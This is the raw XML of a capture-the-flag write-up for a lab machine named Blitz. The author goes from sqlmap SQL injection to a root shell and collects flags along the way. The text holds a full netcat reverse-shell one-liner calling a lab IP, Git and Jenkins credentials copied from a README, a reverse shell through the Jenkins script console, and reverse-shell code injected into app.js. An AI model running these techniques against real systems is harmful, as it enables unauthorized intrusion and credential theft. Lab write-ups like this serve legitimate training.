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B9A41" w14:textId="59B1B1D1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2D0ED77" wp14:editId="4432B4E3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>825500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1879600</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3149600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides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49FF000B" wp14:editId="10FF7BC4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>825500</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5168900</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="740410"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="3" name="Ob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BLITZ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E599165" w14:textId="3CE72A56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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52D53B" w14:textId="3BD130A1" w:rsidR="009761F1" w:rsidRDefault="00BD2ED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BD2EDB">
        <w:t xml:space="preserve">First, I used </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD2EDB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD2EDB">
        <w:t xml:space="preserve"> to gain an OS shell through SQL injection. With </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD2EDB">
        <w:t>sqlmap’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD2EDB">
        <w:t xml:space="preserve"> help, I executed various commands in search of a reverse shell. Finally, the golden command from revshells.com worked like a charm:</w:t>
      </w:r>
      <w:r w:rsidR="00000000">
        <w:rPr>
          <w:rFonts w:ascii="HelveticaNeue" w:eastAsia="HelveticaNeue" w:hAnsi="HelveticaNeue" w:cs="HelveticaNeue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790F23F5" w14:textId="77777777" w:rsidR="00BD2EDB" w:rsidRDefault="00BD2ED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7CB2A40" w14:textId="1C04A3DD" w:rsidR="009761F1" w:rsidRPr="00BD2EDB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr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rm /</w:t>
      </w:r>
      <w:proofErr w:type="spell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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spell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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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f;mkfifo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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 xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spell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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spell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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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f;cat</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spell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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spell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/</w:t>
      </w:r>
      <w:proofErr w:type="spell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f|sh</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spell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i</w:t>
      </w:r>
      <w:proofErr w:type="spell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 xml:space="preserve"> 2&gt;&amp;1|nc 192.168.159.163 4444 &gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD2EDB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="HelveticaNeue" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>/f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264599ED" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572EE9DF" w14:textId="343BC3B4" w:rsidR="009761F1" w:rsidRDefault="00BD2EDB">
      <w:pPr>
        <w:widowControl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3CF9E63" wp14:editId="03E3004E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6750050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2514600" cy="1308100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4" name="Object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EE282" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D46E8B" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24A191C1" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656168FC" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C88299" w14:textId="77777777" w:rsidR="00BD2EDB" w:rsidRDefault="00BD2ED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2C9B807" w14:textId="77777777" w:rsidR="00BD2EDB" w:rsidRDefault="00BD2ED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87959D3" w14:textId="77777777" w:rsidR="00BD2EDB" w:rsidRDefault="00BD2ED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B2134C8" w14:textId="77777777" w:rsidR="00BD2EDB" w:rsidRDefault="00BD2ED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5057D83" w14:textId="3C5AF55F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 w:rsidR="00DE1CF1"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And with that, I was in! I immediately snooped around the </w:t>
      </w:r>
      <w:r w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1"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home directory</w:t>
      </w:r>
      <w:r w:rsidR="00DE1CF1"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>, where I found three users. No passwords in /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00DE1CF1"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>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00DE1CF1"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/passwd, though! But luck struck in the </w:t>
      </w:r>
      <w:r w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1"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root directory</w:t>
      </w:r>
      <w:r w:rsidR="00DE1CF1"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>, where I uncovered my first flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EACEEFF" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7283A931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ICSD{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21a81470de1660a78f10fa4d93480f11}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFEBECD" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AEA9E02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lastRenderedPageBreak/>
        <w:t>As I know the webserver that is in Node.js most times stored in /opt directory, I checked it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BC7CE9" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AB08C8A" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1" w:rsidRDefault="00DE1CF1" w:rsidP="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
        <w:rPr>
          <w:lang w:val="en-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1CF1">
        <w:rPr>
          <w:lang w:val="en-RU"/>
        </w:rPr>
        <w:t>Inside was everything I could hope for: app.js, controllers, routes, and a README. The README even had credentials for Git and Jenkins! I quickly noted:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420C6FF6" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1" w:rsidRDefault="00DE1CF1" w:rsidP="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1CF1">
        <w:rPr>
          <w:lang w:val="en-RU"/>
        </w:rPr>
        <w:t>Git user: git@blitz - BUY4b2RFXH9cG1ILYT4h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7230046F" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1" w:rsidRDefault="00DE1CF1" w:rsidP="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE1CF1">
        <w:rPr>
          <w:lang w:val="en-RU"/>
        </w:rPr>
        <w:t>Jenkins: administrator - K1hM7E3Io0I3u3yawKbS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D7E8EB" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B10A361" w14:textId="21901A61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r w:rsidR="00DE1CF1">
        <w:rPr>
          <w:rFonts w:ascii="HelveticaNeue" w:eastAsia="HelveticaNeue" w:hAnsi="HelveticaNeue" w:cs="HelveticaNeue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>n more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 w:rsidR="00DE1CF1">
        <w:rPr>
          <w:rFonts w:ascii="HelveticaNeue" w:eastAsia="HelveticaNeue" w:hAnsi="HelveticaNeue" w:cs="HelveticaNeue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>details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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38588493" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E2C80E" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="352193F5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$ cd /opt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6435F3CB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$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D6B221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Blitz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7C475F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$ cd Blitz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CAE7DF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$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E201D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app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C92EB06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controllers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4F3400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dataFetcher.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AB046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db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B996A30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db_init.sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="378B7779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middleware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C733418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node_modules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6AA2866F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package.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="780C4B21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package-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lock.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0AAB2608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products.json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="62DEA9E4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public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13287762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README</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12789F21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routes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387D7521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utils</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4003390C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views</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B054D4" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B33031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from README:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064CA637" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45913A5C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$ cat README</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F78C5F8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This server runs in a production mode. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074FA02D" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C0932D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Staging version of the server is running locally on port 3000.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADADAFF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Please use staging version for testing, reporting purposes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79104492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92B38A4" wp14:editId="0A28DB60">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>3086100</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="3147060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="5" name="Obje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DO NOT engage with the production server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00239060" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F6665C0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Credentials for the git repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465A5D67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git@blitz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BUY4b2RFXH9cG1ILYT4h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BE1ACD" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F16F0E7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Credentials for the Jenkins server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E24C43B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administrator - K1hM7E3Io0I3u3yawKbS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5388DE14" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BC8C84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P.S. The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jenkins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doesn't listen for new commits. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10678956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Please rebuild the application after changes. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0C5280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$ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C5E36C" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B287DE" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C131D20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We got credentials for git user and Jenkins server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1451276C" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521FA8DD" w14:textId="5EB921D0" w:rsidR="009761F1" w:rsidRDefault="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r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>Using the Git credentials, I connected via SSH. After some digging, I found the next flag inside user2.txt:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8BB85B" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B5B359" w14:textId="2EC88B10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git@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blitz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:~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$ cat user2.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE3766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ICSD{d82010d823a7b754fb741f17fc2606b3}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52900FBB" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30544995" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C6E920E" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault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Accessing the Jenkins server was next on my list. I navigated to the script console endpoint and uploaded a reverse shell script. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC082BF" w14:textId="0503C378" w:rsidR="009761F1" w:rsidRDefault="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DE1CF1">
        <w:rPr>
          <w:rFonts w:ascii="HelveticaNeue" w:eastAsia="HelveticaNeue" w:hAnsi="HelveticaNeue" w:cs="HelveticaNeue"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>system:</w:t>
      </w:r>
      <w:hyperlink r:id="rId9">
        <w:r w:rsidR="009761F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
        <w:r w:rsidR="009761F1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>://192.168.159.164:8080/manage/script</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4664D8FD" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl/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5C74A5A6" wp14:editId="0203BED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763520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="6" name="Ob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548A4" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6820702D" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F7C5BD1" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DB493A" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAA39A9" w14:textId="16A0D47C" w:rsidR="009761F1" w:rsidRDefault="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
      <w:r w:rsidRPr="00DE1CF1">
        <w:t>Here’s a snippet of what I used to call back to my system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E6D67B" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault="00DE1CF1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1FB70D" w14:textId="0F511435" w:rsidR="00DE1CF1" w:rsidRDefault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noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3480DBD8" wp14:editId="7507B3C8">
            <wp:extent cx="6555416" cy="1087655"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1256503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03851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52" t="47943" r="15275" b="39109"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6681505" cy="110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FF3F9" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault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59BC2AF" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1" w:rsidRDefault="00DE1CF1" w:rsidP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</w:pPr>
      <w:r w:rsidRPr="00DE1CF1"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  <w:t xml:space="preserve">Checking permissions, I discovered I could run sudo /usr/bin/systemctl restart staging.service with no password! After examining staging.service, I spotted that </w:t>
      </w:r>
      <w:r w:rsidRPr="00DE1CF1">
        <w:rPr>
          <w:rFonts w:ascii="HelveticaNeue" w:eastAsia="HelveticaNeue" w:hAnsi="HelveticaNeue" w:cs="HelveticaNeue"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-RU"/>
        </w:rPr>
        <w:t>Jenkins owned all the files</w:t>
      </w:r>
      <w:r w:rsidRPr="00DE1CF1"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  <w:t xml:space="preserve"> in /home/git/pipeline/staging. Taking advantage, I modified app.js to open a reverse shell back to me.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7388A2EA" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault="00DE1CF1" w:rsidP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</w:pPr>
      <w:r w:rsidRPr="00DE1CF1"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  <w:t>This edit landed me shell access yet again, leading to the third flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E0ABC" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault="00DE1CF1" w:rsidP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</w:pPr>
    </w:p>
    <w:p w14:paraId="4C32CE66" w14:textId="5424F140" w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1" w:rsidRDefault="00DE1CF1" w:rsidP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2848080E" wp14:editId="6E69D8D3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7336790</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4267200" cy="482600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="15" name="Object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699C5" w14:textId="4BD80426" w:rsidR="009761F1" w:rsidRDefault="009761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</w:pPr>
    </w:p>
    <w:p w14:paraId="367D5E52" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault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</w:pPr>
    </w:p>
    <w:p w14:paraId="24289B60" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRPr="00DE1CF1" w:rsidRDefault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5E3AF16" w14:textId="77777777" w:rsidR="00DE1CF1" w:rsidRDefault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E374BD3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57E4756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3BE7C36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6F99C62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97D93B8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9C7EE40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5D604F8" w14:textId="5198B0EA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lastRenderedPageBreak/>
        <w:t>I go to /home/git/pipeline/staging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E894EDF" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A3A45F" w14:textId="77777777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Here all files are owned by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jenkins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user.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with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jenkins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user I gave 777 permission to file app.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E57E72" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43309C27" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="00000000">
      <w:pPr>
        <w:widowControl/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Then changed its content added to the beginning this:  const net = require('net'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  <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34DAD180" w14:textId="7489FA55" w:rsidR="009761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</w:p>
    <w:p w14:paraId="7110DC70" w14:textId="774D78AB" w:rsidR="009761F1" w:rsidRDefault="003A4981" w:rsidP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75648" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="0675B7F0" wp14:editId="03CFC298">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2261937</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4254366" cy="2536711"/>
            <wp:effectExtent l="0" t="0" r="635" b="3810"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="11" name="Objec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75" cy="254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</w:p>
    <w:p w14:paraId="432CF322" w14:textId="6F3A8813" w:rsidR="009761F1" w:rsidRPr="00DE1CF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</w:p>
    <w:p w14:paraId="2E784089" w14:textId="41C6AE16" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565091CC" w14:textId="60B5F3F8" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BF62AA1" w14:textId="0063F54B" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DCE556D" w14:textId="101E193B" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FB02903" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34223FF1" w14:textId="0BECCF24" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20FBD0F3" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="778BD04B" w14:textId="77777777" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30B56EDA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D750BA8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FF4BEFF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BAEAA28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FC081AD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E7A8551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82D4095" w14:textId="18FF95A8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EF6883D" w14:textId="1BAF10FA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5408" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="0907654A" wp14:editId="2B05C945">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>5149516</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4408170" cy="571743"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="13" name="Object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1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290" cy="57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B70BF" w14:textId="30DBF5E0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AAEDED6" w14:textId="7F030065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318E35C" w14:textId="3D33E6E6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BD66190" w14:textId="77777777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D010C16" w14:textId="274D083E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E932614" w14:textId="3DB49A53" w:rsidR="009761F1" w:rsidRP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7456" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="31676870" wp14:editId="52C36B1D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>914400</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>6256020</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4408170" cy="596265"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="90335410" name="Object11" descr="A black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410" name="Object11" descr="A black background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23273" b="76244"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4408170" cy="59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I am in node user hooray!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E28B5B6" w14:textId="052A383F" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD00F42" w14:textId="4DA246FF" w:rsidR="009761F1" w:rsidRDefault="009761F1">
      <w:pPr>
        <w:widowControl/>
      </w:pPr>
    </w:p>
